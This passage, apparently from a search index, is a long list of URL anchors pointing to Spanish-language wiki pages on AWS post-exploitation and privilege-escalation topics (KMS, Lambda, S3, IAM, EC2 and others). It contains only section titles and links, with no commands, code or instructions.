curity/aws-post-exploitation/aws-kms-post-exploitation.html#kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#cifrardescifrar-información","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#ransomware-kms-genérico","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#destruir-claves","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#aws---lambda-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#robar-solicitudes-url-de-lambda-de-otros","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#robar-solicitudes-url-de-lambda-de-otros-y-solicitudes-de-extensiones","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#aws---robar-solicitudes-de-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#flujo-de-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#robando-solicitudes-de-lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#pasos-del-ataque","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#referencias","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#aws---lightsail-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#lightsail","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#restaurar-instantáneas-antiguas-de-db","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#restaurar-instantáneas-de-instancia","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#acceder-a-información-sensible","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#aws---organizaciones-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#organizaciones","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#salir-de-la-org","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#aws---rds-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rds","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdscreatedbsnapshot-rdsrestoredbinstancefromdbsnapshot-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsmodifydbsnapshotattribute-rdscreatedbsnapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdownloaddblogfileportion","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdeletedbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsstartexporttask","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#aws---s3-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#información-sensible","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#pivotar","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#ransomware-en-s3","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#aws---secrets-manager-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#secrets-manager","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#leer-secretos","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-cambiar-el-valor-del-secreto","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-cambiar-la-clave-kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-eliminando-secreto","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#aws---ses-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#ses","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendrawemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendtemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulktemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulkemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbounce","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendcustomverificationemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#aws---sns-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#sns","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#interrumpir-mensajes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsdeletetopic","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snspublish","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssettopicattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssubscribe--snsunsubscribe","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsaddpermission--snsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snstagresource-snsuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#aws---sqs-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqs","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssendmessage-sqssendmessagebatch","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsdeletequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqspurgequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssetqueueattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqstagqueue--sqsuntagqueue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#aws---sso-y-post-explotación-de-identitystore","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#sso-y-identitystore","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#ssodeletepermissionset--ssoputpermissionsboundarytopermissionset--ssodeleteaccountassignment","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#aws---step-functions-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#step-functions","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesrevealsecrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesdeletestatemachine-statesdeletestatemachineversion-statesdeletestatemachinealias","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatemaprun","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesstopexecution","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statestagresource-statesuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatestatemachine-lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#configuración-de-la-víctima-contexto-para-la-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#aws---sts-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#sts","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#de-credenciales-iam-a-consola","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#eludir-restricciones-de-user-agent-desde-python","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#aws---vpn-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#vpn","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws---escalación-de-privilegios","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#escalación-de-privilegios-en-aws","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#herramientas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#aws---apigateway-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigateway","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewaypost","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdaterestapipolicy-apigatewaypatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayputintegration-apigatewaycreatedeployment-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdateauthorizer-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdatevpclink","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#aws---chime-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#chimecreateapikey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#aws---codebuild-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildcreateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch-s3getobject-s3putobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#aws---codepipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#iampassrole-codepipelinecreatepipeline-codebuildcreateproject-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codebuildupdateproject-codepipelineupdatepipeline-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipelinepollforjobs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#aws---codestar-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestar","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateprojectfromtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws---cloudformation-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationcreatestack","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatestackset--cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#iampassrole-cloudformationcreatestacky-cloudformationdescribestacks","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#aws---cognito-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#recolección-de-credenciales-del-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identitysetidentitypoolroles-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identityupdate-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreategroup--cognito-idpupdategroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminconfirmsignup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmincreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminenableuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmininitiateauth--cognito-idpadminrespondtoauthchallenge","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetusersettings--cognito-idpsetusermfapreference--cognito-idpsetuserpoolmfaconfig--cognito-idpupdateuserpool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminupdateuserattributes","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserpoolclient--cognito-idpupdateuserpoolclient","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserimportjob--cognito-idpstartuserimportjob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateidentityprovider--cognito-idpupdateidentityprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-sync-análisis","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#herramientas-automáticas","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#aws---datapipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#datapipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#iampassrole-datapipelinecreatepipeline-datapipelineputpipelinedefinition-datapipelineactivatepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws---directory-services-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#servicios-de-directorio","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#dsresetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws-management-console","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#aws---dynamodb-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodb","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodbputresourcepolicy-y-opcionalmente-dynamodbgetresourcepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#post-explotación","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#todo-leer-datos-abusando-de-streams-de-datos","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#aws---ebs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebslistsnapshotblocks-ebsgetsnapshotblock-ec2describesnapshots","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ec2createsnapshot","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#aws---ec2-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole---iamaddroletoinstanceprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole--ec2associateiaminstanceprofile-ec2disassociateiaminstanceprofile--ec2replaceiaminstanceprofileassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2requestspotinstancesiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2modifyinstanceattribute","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2createlaunchtemplateversionec2createlaunchtemplateec2modifylaunchtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscalingcreatelaunchconfiguration-autoscalingcreateautoscalinggroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscaling","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendsshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendserialconsolesshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#describe-launch-templatesdescribe-launch-template-versions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#aws---ecr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtokenecrbatchgetimage","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtoken-ecrbatchchecklayeravailability-ecrcompletelayerupload-ecrinitiatelayerupload-ecrputimage-ecruploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicgetauthorizationtoken-ecr-publicbatchchecklayeravailability-ecr-publiccompletelayerupload-ecr-publicinitiatelayerupload-ecr-publicputimage-ecr-publicuploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrputregistrypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#aws---ecs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsstarttask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistertaskdefinition--ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsexecutecommand-ecsdescribetasks-ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistercontainerinstance","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecscreatetaskset-ecsupdateserviceprimarytaskset-ecsdescribetasksets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#aws---efs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#efs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemdeletefilesystempolicyelasticfilesystemputfilesystempolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemclientmountelasticfilesystemclientrootaccesselasticfilesystemclientwrite","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemcreatemounttarget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemmodifymounttargetsecuritygroups","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#aws---elastic-beanstalk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-permisos-de-escritura-en-s3-y-muchos-otros","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplication-elasticbeanstalkcreateenvironment-elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-iampassrole-y-más","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-cloudformationgettemplate-cloudformationdescribestackresources-cloudformationdescribestackresource-autoscalingdescribeautoscalinggroups-autoscalingsuspendprocesses-autoscalingsuspendprocesses","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#aws---emr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#iampassrole-elasticmapreducerunjobflow","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreducecreateeditor-iamlistroles-elasticmapreducelistclusters-iampassrole-elasticmapreducedescribeeditor-elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#aws---eventbridge-scheduler-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#iampassrole-schedulercreateschedule--schedulerupdateschedule","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#aws---gamelift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#gameliftrequestuploadcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#aws---glue-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatejob--glueupdatejob-gluestartjobrun--gluecreatetrigger","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatejob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#aws---iam-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreatepolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamsetdefaultpolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateloginprofile--iamupdateloginprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateservicespecificcredential--iamresetservicespecificcredential","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachuserpolicy--iamattachgrouppolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachrolepolicy---stsassumeroleiamcreaterole---iamputuserpolicy--iamputgrouppolicy--iamputrolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateassumerolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamuploadsshpublickey--iamdeactivatemfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamresyncmfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdatesamlprovider-iamlistsamlproviders-iamgetsamlprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateopenidconnectproviderthumbprint-iamlistopenidconnectproviders-iam-getopenidconnectprovider-","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#referencias","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#aws---kms-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kms","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmslistkeyskmsputkeypolicy-kmslistkeypolicies-kmsgetkeypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreategrant","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreatekey-kmsreplicatekey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmsdecrypt","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#aws---lambda-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdainvokefunction--lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreateeventsourcemapping","pentesting-cloud/